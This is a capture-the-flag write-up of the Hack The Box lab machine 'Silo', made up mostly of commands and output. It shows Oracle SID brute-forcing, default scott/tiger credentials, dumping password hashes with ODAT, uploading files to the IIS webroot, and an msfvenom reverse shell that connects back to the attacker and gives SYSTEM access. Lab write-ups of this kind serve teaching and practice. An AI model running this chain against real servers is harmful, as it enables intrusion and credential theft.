Hack The Box : Silo
4 August, 2021
Starting off with an nmap scan
# nmap -A 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.10.10.82
Host is up (0.40s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=8/4%OT=80%CT=1%CU=44452%PV=Y%DS=2%DC=T%G=Y%TM=610AAC03
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=RD%CI=I%II=I%TS=8)SEQ
OS:(SP=107%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=7)OPS(O1=M54BNW8ST11%O2=M54
OS:BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W
OS:1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%
OS:O=M54BNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD
OS:=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%
OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-04T15:02:16
|_ start_date: 2021-08-04T14:58:30
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 334.53 ms 10.10.16.1
2 167.50 ms 10.10.10.82
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.41 seconds
Headers indicate that the IIS server is powered by ASP.NET
# curl -v http://10.10.10.82
* Trying 10.10.10.82:80...
* Connected to 10.10.10.82 (10.10.10.82) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.82
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: text/html
< Accept-Ranges: bytes
< ETag: "1114bde2a84d31:0"
< Server: Microsoft-IIS/8.5
< Content-Length: 701
<
I couldn't find anything from Gobuster, Nikto or SMB enumeration so I went ahead and searched for exploits for Windows Server 2008 R2
# searchsploit microsoft server 2008 r2
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
This exploit looked promising but it kept failing due to connection resets from the box.
# python3 /usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py 10.10.10.82
[*] MS17-010 Exploit - SMBv1 SrvOs2FeaToNt OOB
[*] Exploit running.. Please wait
Traceback (most recent call last):
File "/usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py", line 133, in <module>
main(sys.argv[1])
File "/usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py", line 119, in main
data = [j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]
File "/usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py", line 119, in <listcomp>
data = [j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]
ConnectionResetError: [Errno 104] Connection reset by peer
I decided to look at the port 1521 next, running Oracle TNS Listener. TNS names are like aliases for services, and TNS Listener acts as a lookup directory for such services.
$ tnscmd10g --10G status -h 10.10.10.82
sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=ping)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to 10.10.10.82:1521
writing 179 bytes
reading
.A......"..5(DESCRIPTION=(TMP=)(VSNNUM=0)(ERR=0)(ALIAS=LISTENER))
I kept getting the same response for each command through tnscmd10g so I assumed that this listener is protected, meaning I'll have to find some credentials.
I started looking for SIDs, and found one XE
# nmap --script +oracle-sid-brute -p 1521 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 10:36 EDT
Nmap scan report for 10.10.10.82
Host is up (0.18s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-sid-brute:
|_ XE
Nmap done: 1 IP address (1 host up) scanned in 521.07 seconds
I followed HackTricks' guide to testing port 1521 https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
Using ODAT, I found credentials for the SID XE
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
I tried two of the RCE methods mentioned but didn't have enough privilege to execute commands
$ ./odat.py dbmsscheduler -s 10.10.10.82 -d XE -U scott -P tiger --exec "C:\windows\system32\cmd.exe /c echo 123>>"
[1] (10.10.10.82:1521): Execute the `C:\windows\system32\cmd.exe /c echo 123>>` on the 10.10.10.82 server
[-] The `C:\windows\system32\cmd.exe /c echo 123>>` command was not executed on the 10.10.10.82 server: `ORA-27486: insufficient privileges ORA-06512: at "SYS.DBMS_ISCHED", line 124 ORA-06512: at "SYS.DBMS_SCHEDULER", line 271 ORA-06512: at line 1`
[+] The Job is running
$ ./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --exec "C:/windows/system32" "/c echo 123"
[1] (10.10.10.82:1521): Execute the /c echo 123 command stored in the C:/windows/system32 path
[-] There is an error: `ORA-01031: insufficient privileges`
I tried to upload a file hoping that I can put it in the directory served by IIS
$ ./odat.py utlfile -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\inetpub\wwwroot" temp.txt temp.txt
[1] (10.10.10.82:1521): Put the temp.txt local file in the C:\inetpub\wwwroot folder like temp.txt on the 10.10.10.82 server
[-] Impossible to put the temp.txt file: `ORA-01031: insufficient privileges`
I read more around the ODAT tool and learnt about the --sysdba flag. Using this it looked like I was able to run commands but uploading a file still gave an error
# ./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec "C:/windows/system32/" "cmd.exe"
[1] (10.10.10.82:1521): Execute the cmd.exe command stored in the C:/windows/system32/ path
[+] The cmd.exe command stored in C:/windows/system32/ has been executed (normally)
# ./odat.py dbmsadvisor -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile C:\\inetpub\\wwwroot temp.txt ./temp.txt
[1] (10.10.10.82:1521): Put the ./temp.txt local file in the C:\inetpub\wwwroot path (named temp.txt) of the 10.10.10.82 server
[-] The ./temp.txt local file was not put in the remote C:\inetpub\wwwroot path (named temp.txt): `ORA-06550: line 1, column 7: PLS-00306: wrong number or types of arguments in call to 'CREATE_FILE' ORA-06550: line 1, column 7: PL/SQL: Statement ignored`
Next I ran the passwordstealer ODAT command and got a bunch of hashes
# ./odat.py passwordstealer -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --get-passwords
[1] (10.10.10.82:1521): Try to get Oracle hashed passwords
[+] Here are Oracle hashed passwords (some accounts can be locked):
SYS; FBA343E7D6C8BC9D; S:9665BEDD55BCDB06121B34917713A19F7C3AC2F34554781395D2560B1D1D
SYSTEM; B5073FE1DE351687; S:486D06A8C62E20F7BDE616E55889CD0A68AB8E6C7FCB86D16CB576441467
OUTLN; 4A3BA55E08595C81; S:142AD444D8A63983FF69C77DBFD3E60947C14237AEC71031E24F5228D44C
DIP; CE4A36B8E06CA59C; S:1E4C37D0E8DC2E556D3C02A961ACEF1500B315D076BE13E578D1A28FC757
ORACLE_OCM; 5A2E026A9157958C; S:1575D1C89A1AACFE161ED788D2DC59CF6C57AE3B6CCC341D831AAF5BC447
DBSNMP; E066D214D5421CCC; S:59354E99120C523F77232A8CCFDE5E780591FCE14109EEE2C86F4A9B4E8F
APPQOSSYS; 519D632B7EE7F63A; S:4237CCB702887B049107EE6D13C312123F40E3F51208B2B70D6DA92E621D
CTXSYS; D1D21CA56994CAB6; S:3548FDA49F84F2F7ECE4635BA0FD714EC2446723074ED6167F1CD9B6EDFB
XDB; E76A6BD999EF9FF1; S:88D6BE2B593143BD5AE5185C564826F9213E71361230D3360E36C3FF55D2
ANONYMOUS; anonymous; None
XS$NULL; DC4FCC8CB69A6733; S:6C4F97FF654AE30BCD9BDBB3007EF952B5943F0A9ED491455E9FB185D8A1
MDSYS; 72979A94BAD2AF80; S:F337C5D6300E3F8CDEDE0F2B2336415EAAE098A700A35E6731BF1370657E
HR; 4C6D73C3E8B0F0DA; S:F437C1647EBCEB1D1FB4BB3D866953B4BF612B343944B899E061B361F31B
FLOWS_FILES; 30128982EA6D4A3D; S:A3657555975A9F7527C4B97637734D74465C592B9D231CA3DAB100ED5865
APEX_PUBLIC_USER; 4432BA224E12410A; S:E8D8CCD600CBCEA08ACB158A502C5DA711B00146404621BB2F83E8997246
APEX_040000; E7CE9863D7EEB0A4; S:03D9B47D20C9A9EC3023177D80C0EE2D1DCEDA619215C2405177CEFFEE76
SCOTT; F894844C34402B67; S:16015028693BC0B4C82472A60D337F932B9AD86A3711D2F83967AF2DE20C
[+] Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):
FBA343E7D6C8BC9D:SYS
B5073FE1DE351687:SYSTEM
4A3BA55E08595C81:OUTLN
CE4A36B8E06CA59C:DIP
5A2E026A9157958C:ORACLE_OCM
E066D214D5421CCC:DBSNMP
519D632B7EE7F63A:APPQOSSYS
D1D21CA56994CAB6:CTXSYS
E76A6BD999EF9FF1:XDB
anonymous:ANONYMOUS
DC4FCC8CB69A6733:XS$NULL
72979A94BAD2AF80:MDSYS
4C6D73C3E8B0F0DA:HR
30128982EA6D4A3D:FLOWS_FILES
4432BA224E12410A:APEX_PUBLIC_USER
E7CE9863D7EEB0A4:APEX_040000
F894844C34402B67:SCOTT
[+] Here are 10g Oracle hashed passwords for John the Ripper (some accounts can be locked):
SYS:FBA343E7D6C8BC9D
SYSTEM:B5073FE1DE351687
OUTLN:4A3BA55E08595C81
DIP:CE4A36B8E06CA59C
ORACLE_OCM:5A2E026A9157958C
DBSNMP:E066D214D5421CCC
APPQOSSYS:519D632B7EE7F63A
CTXSYS:D1D21CA56994CAB6
XDB:E76A6BD999EF9FF1
ANONYMOUS:anonymous
XS$NULL:DC4FCC8CB69A6733
MDSYS:72979A94BAD2AF80
HR:4C6D73C3E8B0F0DA
FLOWS_FILES:30128982EA6D4A3D
APEX_PUBLIC_USER:4432BA224E12410A
APEX_040000:E7CE9863D7EEB0A4
SCOTT:F894844C34402B67
While the hashes were being cracked by JTR, I tried the utlfile command with the --sysdba flag and it worked, implying that I could successfully upload a file
$ ./odat.py utlfile -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile "C:\inetpub\wwwroot" temp.txt temp.txt
[1] (10.10.10.82:1521): Put the temp.txt local file in the C:\inetpub\wwwroot folder like temp.txt on the 10.10.10.82 server
[+] The temp.txt file was created on the C:\inetpub\wwwroot directory on the 10.10.10.82 server like the temp.txt file
$ curl 10.10.10.82/temp.txt
TEMPORARY FILE!
Flags
Using the file upload + execution capabilities I was able to upload a reverse shell binary and get a reverse shell, straightaway as NT Authority\System and thus grab both the flags.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.174 LPORT=4445 -a x64 -f exe > shell.exe
$ ./odat.py utlfile -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile "C:\inetpub\wwwroot" shell.exe shell.exe
[1] (10.10.10.82:1521): Put the ../Boxes/Silo/shell.exe local file in the C:\inetpub\wwwroot folder like shell3.exe on the 10.10.10.82 server
[+] The ../Boxes/Silo/shell.exe file was created on the C:\inetpub\wwwroot directory on the 10.10.10.82 server like the shell3.exe file
$ ./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec "C:\inetpub\wwwroot" "shell.exe"
# nc -lvnp 4445
listening on [any] 4445 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.82] 49167
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>dir
Volume in drive C has no label.
Volume Serial Number is 78D4-EA4D
Directory of C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE
01/01/2018 01:48 AM <DIR> .
01/01/2018 01:48 AM <DIR> ..
01/01/2018 01:11 AM 2,048 hc_xe.dat
01/01/2018 01:12 AM 73 initXE.ora
05/29/2014 01:05 PM 31,744 oradba.exe
08/04/2021 03:58 PM 4,060 oradim.log
01/07/2018 02:25 PM 1,536 PWDXE.ora
5 File(s) 39,461 bytes
2 Dir(s) 14,524,948,480 bytes free
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
nt authority\system
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>dir C:\Users
dir C:\Users
Volume in drive C has no label.
Volume Serial Number is 78D4-EA4D
Directory of C:\Users
01/04/2018 10:40 PM <DIR> .
01/04/2018 10:40 PM <DIR> ..
01/03/2018 02:03 AM <DIR> .NET v2.0
01/03/2018 02:03 AM <DIR> .NET v2.0 Classic
01/03/2018 10:23 PM <DIR> .NET v4.5
01/03/2018 10:23 PM <DIR> .NET v4.5 Classic
01/01/2018 01:49 AM <DIR> Administrator
01/03/2018 02:03 AM <DIR> Classic .NET AppPool
01/07/2018 03:04 PM <DIR> Phineas
08/22/2013 04:39 PM <DIR> Public
0 File(s) 0 bytes
10 Dir(s) 14,524,948,480 bytes free
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type C:\Users\Phineas\Desktop\user.txt
type C:\Users\Phineas\Desktop\user.txt
<flag>
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
<flag>